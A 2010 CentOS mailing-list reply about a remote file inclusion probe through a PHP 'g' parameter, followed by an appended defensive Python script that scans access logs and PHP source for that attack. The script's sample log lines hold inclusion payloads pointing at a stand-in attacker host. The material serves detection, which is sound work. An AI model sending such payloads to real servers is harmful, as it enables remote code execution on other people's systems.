On Sun, 22 Aug 2010, Gordon Messmer wrote:

> No, they didn't. That's why you were warned that it was a potentially
> successful probe.
>
> The exploit requires that you are running php and have a script that
> includes a file referenced by the global variable "g" (or maybe the http
> request variable "g"). You should check the files that appear at the
> URLs indicated in your logs. If any of those files are php, then you
> should further check those to see if they might include files based on
> the "g" variable. If so, you may have been compromised.

Hello Gordon,

Thanks...you are right, those aren't 404 errors, I was looking at
something else. I checked through my logs, checked a bunch of files,
directories, and such...everything appears to be in order. I tried the
URLs they tried and all I got was my website and a 404 error for the two
links. I do have PHP installed, but I don't have any PHP scripts running.

If anyone else has any other suggestions, though, I'll keep digging.

*******************************************************************************
Gilbert Sebenste
(My opinions only!)
Staff Meteorologist, Northern Illinois University
E-mail: sebenste@xxxxxxxxxxxxxxxxxxxxx
web: http://weather.admin.niu.edu
*******************************************************************************
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos
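The check described in the quoted advice above, as an added example that is not part of the original thread: list the logged requests whose "g" parameter carries a remote URL together with the status the server returned, then flag PHP lines where an include depends on "g". The function names, the log lines and the PHP snippet are constructed for illustration, and the access log is assumed to be in Apache common/combined format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target and status from a common/combined-format access log entry.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')
# include/require whose argument mentions $g or a request/global array entry "g".
INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\b[^;]*'
    r'(?:\$g\b|\$(?:_GET|_REQUEST|_POST|GLOBALS)\[\s*[\'"]g[\'"]\s*\])')

def remote_g_requests(log_lines):
    """Return (path, status) for requests whose g parameter is a remote URL."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # not a request line we understand
        target, status = urlsplit(m.group(1)), int(m.group(2))
        for value in parse_qs(target.query).get("g", []):
            if re.match(r'(?:https?|ftp)://', value, re.I):
                hits.append((target.path, status))
                break
    return hits

def include_lines(php_source):
    """Return 1-based line numbers where an include/require depends on g."""
    return [n for n, text in enumerate(php_source.splitlines(), 1)
            if INCLUDE_RE.search(text)]

# Constructed sample data (documentation addresses, not taken from the thread).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2010:03:11:02 -0500] "GET /index.html?g=http://attacker.example/x.txt? HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [22/Aug/2010:03:11:03 -0500] "GET /forum/view.php?g=http://attacker.example/x.txt? HTTP/1.1" 404 209 "-" "-"',
    '198.51.100.7 - - [22/Aug/2010:03:12:40 -0500] "GET /gallery.php?g=3 HTTP/1.1" 200 811 "-" "-"',
]
SAMPLE_PHP = "<?php\n$g = $_GET['g'];\ninclude($g . '.php');\ninclude 'footer.php';\n"

if __name__ == "__main__":
    for path, status in remote_g_requests(SAMPLE_LOG):
        note = "served: inspect this file" if status == 200 else "not served"
        print(f"{status} {path} ({note})")
    print("include depends on g at lines:", include_lines(SAMPLE_PHP))
```

A 200 on a static page such as the first sample line only means the page was served with the parameter ignored; the include check matters for paths that turn out to be PHP.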